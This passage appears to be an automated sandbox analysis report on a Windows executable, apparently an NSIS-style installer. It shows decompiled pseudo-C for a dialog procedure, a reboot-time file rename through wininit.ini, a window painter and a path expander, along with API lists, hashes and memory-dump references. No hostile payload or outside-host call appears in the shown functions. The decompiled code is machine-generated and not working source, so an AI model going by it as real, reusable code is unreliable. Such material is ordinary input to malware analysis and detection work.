            • ShowWindow.USER32(00000000,?), ref: 00403BA6
            • EnableWindow.USER32(00000000,?), ref: 00403BB5
            • EnableWindow.USER32(?,?), ref: 00403BD0
            • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
            • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
            • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
            • ShowWindow.USER32(?,0000000A), ref: 00403D64
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
            • String ID:
            • API String ID: 3950083612-0
            • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
            • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
            Download Yara Rule
            C-Code - Quality: 92%
            			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















            0x00403eff
            0x00404025
            0x00404081
            0x00404085
            0x0040415c
            0x0040415e
            0x0040415e
            0x00404164
            0x00404164
            0x00404167
            0x00000000
            0x0040416e
            0x00404093
            0x00404095
            0x0040409f
            0x004040aa
            0x004040ad
            0x004040b0
            0x004040bb
            0x004040be
            0x004040c5
            0x004040d3
            0x004040eb
            0x004040fe
            0x0040410e
            0x00404110
            0x00404110
            0x004040c5
            0x0040411a
            0x00000000
            0x00404125
            0x00404129
            0x0040413a
            0x0040413a
            0x00404140
            0x0040414e
            0x0040414e
            0x00000000
            0x00404152
            0x0040411a
            0x00404030
            0x00000000
            0x00404044
            0x0040404a
            0x00404050
            0x00000000
            0x00000000
            0x00404075
            0x00404077
            0x0040407c
            0x00000000
            0x0040407c
            0x00404030
            0x00403f05
            0x00403f08
            0x00403f0d
            0x00403f1e
            0x00403f1e
            0x00403f25
            0x00403f28
            0x00403f2a
            0x00403f2f
            0x00403f38
            0x00403f3e
            0x00403f4a
            0x00403f4d
            0x00403f56
            0x00403f5b
            0x00403f5e
            0x00403f63
            0x00403f7a
            0x00403f81
            0x00403f94
            0x00403f97
            0x00403fac
            0x00403fb3
            0x00403fb8
            0x00403fbd
            0x00403fbd
            0x00403fcc
            0x00403fdb
            0x00403fdd
            0x00403ff3
            0x00404002
            0x00404004
            0x00000000

            APIs
            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
            • GetDlgItem.USER32 ref: 00403F8E
            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
            • GetSysColor.USER32(?), ref: 00403FBD
            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
            • lstrlenA.KERNEL32(?), ref: 00403FE5
            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
            • GetDlgItem.USER32 ref: 00404065
            • SendMessageA.USER32(00000000), ref: 00404068
            • GetDlgItem.USER32 ref: 00404093
            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
            • LoadCursorA.USER32 ref: 004040E2
            • SetCursor.USER32(00000000), ref: 004040EB
            • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
            • LoadCursorA.USER32 ref: 0040410B
            • SetCursor.USER32(00000000), ref: 0040410E
            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: N$open
            • API String ID: 3615053054-904208323
            • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
            • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















            0x00405715
            0x0040571c
            0x00405720
            0x00405729
            0x0040572d
            0x00405879
            0x00405879
            0x00000000
            0x00405879
            0x0040572d
            0x00405739
            0x0040574f
            0x00405777
            0x00405782
            0x00405786
            0x004057a9
            0x004057b1
            0x004057bd
            0x004057d4
            0x004057da
            0x004057df
            0x00000000
            0x00000000
            0x004057ee
            0x004057f0
            0x004057fd
            0x00405801
            0x00405872
            0x00405873
            0x00000000
            0x0040581d
            0x0040582a
            0x0040588f
            0x00405896
            0x0040583d
            0x0040583d
            0x0040583f
            0x00405848
            0x00405853
            0x00405865
            0x0040586c
            0x00000000
            0x0040586c
            0x00405898
            0x0040589e
            0x004058a0
            0x004058af
            0x004058af
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004058a2
            0x004058a2
            0x004058a4
            0x004058a7
            0x004058ab
            0x00000000
            0x004058a2
            0x00405835
            0x0040583a
            0x00000000
            0x0040583a
            0x00405801
            0x00405751
            0x0040575c
            0x00405765
            0x00405769
            0x00000000
            0x00000000
            0x00405769
            0x00405883

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
            • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
            • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
            • wsprintfA.USER32 ref: 004057A0
            • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
            • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
            • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
            • GlobalFree.KERNEL32 ref: 0040586C
            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
            • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
            • API String ID: 3633819597-1342836890
            • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
            • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
            Download Yara Rule
            C-Code - Quality: 90%
            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













            0x0040100a
            0x00401039
            0x00401047
            0x0040104d
            0x00401051
            0x0040105b
            0x00401061
            0x00401064
            0x004010f3
            0x00401089
            0x0040108c
            0x004010a6
            0x004010bd
            0x004010cc
            0x004010cf
            0x004010d5
            0x004010d9
            0x004010e4
            0x004010ed
            0x004010ef
            0x004010ef
            0x00401100
            0x00401105
            0x0040110d
            0x00401110
            0x00401112
            0x00401118
            0x0040111f
            0x00401126
            0x00401130
            0x00401142
            0x00401156
            0x00401160
            0x00401165
            0x00401165
            0x00401110
            0x0040116e
            0x00000000
            0x00401178
            0x00401010
            0x00401013
            0x00401015
            0x0040101f
            0x0040101f
            0x00000000

            APIs
            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectA.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
            • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
            Download Yara Rule
            C-Code - Quality: 88%
            			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















            0x004059e8
            0x004059ef
            0x00405a00
            0x00405a00
            0x00405a0a
            0x00405a0c
            0x00405a13
            0x00405a1b
            0x00405a21
            0x00405a24
            0x00405a24
            0x00405bd5
            0x00405bd5
            0x00405bd9
            0x00405bdc
            0x00000000
            0x00000000
            0x00405a31
            0x00405a37
            0x00000000
            0x00000000
            0x00405a3d
            0x00405a3e
            0x00405a41
            0x00405bc8
            0x00405bd2
            0x00405bd4
            0x00405bd4
            0x00405bca
            0x00405bcc
            0x00405bce
            0x00405bcf
            0x00405bcf
            0x00000000
            0x00405bc8
            0x00405a47
            0x00405a4b
            0x00405a5b
            0x00405a62
            0x00405a65
            0x00405a68
            0x00405a6a
            0x00405a6d
            0x00405a70
            0x00405a71
            0x00405a75
            0x00405a78
            0x00405b73
            0x00405b77
            0x00405ba7
            0x00405bab
            0x00405bb0
            0x00405bb4
            0x00405bb4
            0x00405bb9
            0x00405bbf
            0x00405bc1
            0x00000000
            0x00405bc1
            0x00405b79
            0x00405b7c
            0x00405b91
            0x00405b98
            0x00405b7e
            0x00405b85
            0x00405b85
            0x00405ba0
            0x00405ba3
            0x00405b6b
            0x00405b6c
            0x00405b6c
            0x00000000
            0x00405ba3
            0x00405a7e
            0x00405a82
            0x00405a87
            0x00405a88
            0x00405a8b
            0x00405a96
            0x00405a99
            0x00405a9c
            0x00405ab5
            0x00405ab8
            0x00405ae5
            0x00405ae8
            0x00405af8
            0x00405afb
            0x00000000
            0x00000000
            0x00405b03
            0x00000000
            0x00405b03
            0x00405af0
            0x00000000
            0x00405af0
            0x00405aca
            0x00405acf
            0x00405ad2
            0x00000000
            0x00000000
            0x00405ade
            0x00000000
            0x00405a9e
            0x00405aae
            0x00405b09
            0x00405b09
            0x00405b0c
            0x00000000
            0x00000000
            0x00000000
            0x00405b0c
            0x00405a8d
            0x00405a8d
